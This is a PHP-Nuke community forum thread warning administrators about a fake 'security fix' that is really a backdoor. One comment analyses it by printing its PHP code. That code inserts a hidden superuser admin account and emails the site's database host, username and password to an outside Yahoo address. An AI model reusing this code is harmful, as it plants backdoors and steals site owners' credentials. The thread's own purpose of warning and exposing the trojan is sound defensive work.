|
- Readme First! -
Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 290 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
|
 Anonymous writes "Hi Nukers
Some punk claiming to be from "NukeSecure" has submitted a news article saying that supposidly people can gain access to your site using admin.php
THIS IS A SCRIPT KIDDIE. DO NOT DOWNLOAD OR IMPLEMENT THAT FILE
After checking the code through, I found code that not only creates an admin account - superuser admin account - with a pre-defined username and password, but it then emails this guy with your site URL, and your database username and password.
AI"
|
|
Posted on Tuesday, July 08 @ 12:34:15 CEST by [RETIRED]Raven |
|
|
|
|
| |
|
Average Score: 5
Votes: 1
|
|
|
|
|
|
|
| | The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
| No Comments Allowed for Anonymous, please register | | | | |
Re: Security Warning (Score: 1)
by chatserv on Tuesday, July 08 @ 13:28:03 CEST
(User Info | Send a Message) http://nukeresources.com | Since most of you know i often provide a file so that users can manually perform the fixes and seeing as NukeSecure forgot to do so i will do it for him, not only that, i'll even explain what each "fix" does so let's go:
if ($nuke == "secure") {
$result = mysql_query("INSERT INTO nuke_authors VALUES ('god', 'God', '', '', '9984b7b73df597078be8085131ef5fc1', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,'')");
if (!$result) { echo "- data insertion error.
"; } else { echo "- data inserted.
"; }
}
This particular "fix" attempts to insert an admin with God access, of course since it won't be you and the password is encrypted only the author of this "fix" will be able to access this brand new admin account, sweet huh?
Find:
.""
Replace with:
.""
The inserted name value will allow this new admin with additional tools for his hacking tools, clever? umm, let me think on that
one for a bit
include ("config.php");
mysql_select_db($dbname) or die("Could not select the database: " . $db[db]);
$result=mysql_query("SELECT * FROM ".$prefix."_config");
while ($user = mysql_fetch_array($result)) {
{
{
$AdminMessage .="".$user["sitename"].",".$user["startdate"].",".$user["adminmail"].",".$user["notify_email"]."
";
$AdminMessage .="$dbhost
";
$AdminMessage .= "user:$dbuname
";
$AdminMessage .= "$dbpass
";
$AdminMessage .= "dname:$dbname
";
mail("nukesecure@yahoo.co.uk", "".$user["nukeurl"]."", "$AdminMessage", "From:");
}
}
}
This insert will mail the admin login info to the author of the "fix", essential part of any good "security fix", no patch should be missing this beauty
Last but not least, the credits:
/* fixed by nukesecure */
Oh it was fixed alright, no doubts about that one. |
| | | | |
Re: Security Warning (Score: 1)
by Raven on Tuesday, July 08 @ 14:01:39 CEST
(User Info | Send a Message) http://ravenphpscripts.com | | Just in case his email addy was real, I contacted Yahoo and they are taking appropriate steps also. Wonder if we should contact SF? |
]
Re: Security Warning (Score: 1)
by Linzilla on Tuesday, July 08 @ 14:42:18 CEST
(User Info | Send a Message) | Linzilla let me borrow his account to post this here.
I already contacted Yahoo (about 3 seconds b4 I started posting news articles on every site i could think of that people visit on a regular basis), so he'll be gone very soon.
Nice of him to provide us with his email addy no?
I also like the way he was naieve enough to think we'd post that "fix" on a site without checking the code to see what the fix was (if indeed it is a fix, which this obviously isnt').
Anyway. I'm off now before I inadvertantly get this account banned. Just thought you'd appreciate the warning. |
]
| | | | |
Re: Security Warning (Score: 1)
by disgruntledtech on Wednesday, July 09 @ 06:42:10 CEST
(User Info | Send a Message) http://www.voicesinmyhead.net | | it could be easily added but most likely, if you implement that on your site, you wont have a site long enough to install analyze.php |
]
| | | | |
Re: Security Warning (Score: 1)
by disgruntledtech on Wednesday, July 09 @ 06:38:41 CEST
(User Info | Send a Message) http://www.voicesinmyhead.net | | i wouldnt say sneaky -id say hes got guts -anybody coulda written this code -if he'd been sneaky, he woulda written it into a module -that woulda been sneaky! |
]
Re: Security Warning (Score: 1)
by Cergorach on Wednesday, July 09 @ 07:14:20 CEST
(User Info | Send a Message) | After reading that rather scarry piece of 'advice', i started thinking. I'm not installing anything on my phpnuke from anyone that i don't trust, but that are so few people ;-) Maybe NukeCops could provide a service where they 'approve' scripts/modules/etc.
Mr.C
ps. i think it would be really evil to include something like this in something as simple as a theme... |
]
Re: Security Warning (Score: 1)
by allevon on Wednesday, July 09 @ 10:51:49 CEST
(User Info | Send a Message) http://www.AlleVonTech.com | | Sounds like an EXCELLENT idea! I like it, thanks for the suggestion. Hopefully, something like this would be a major deterrent to these dorks. |
]
| | | | |
Re: Security Warning (Score: 1)
by Olipro on Wednesday, July 09 @ 08:18:29 CEST
(User Info | Send a Message) | | makes me feel like setting a trap, anyhow, his script wouldn't work, i created a pic of the day mod and subsequently added a new row to the authors section |
| | | | | |
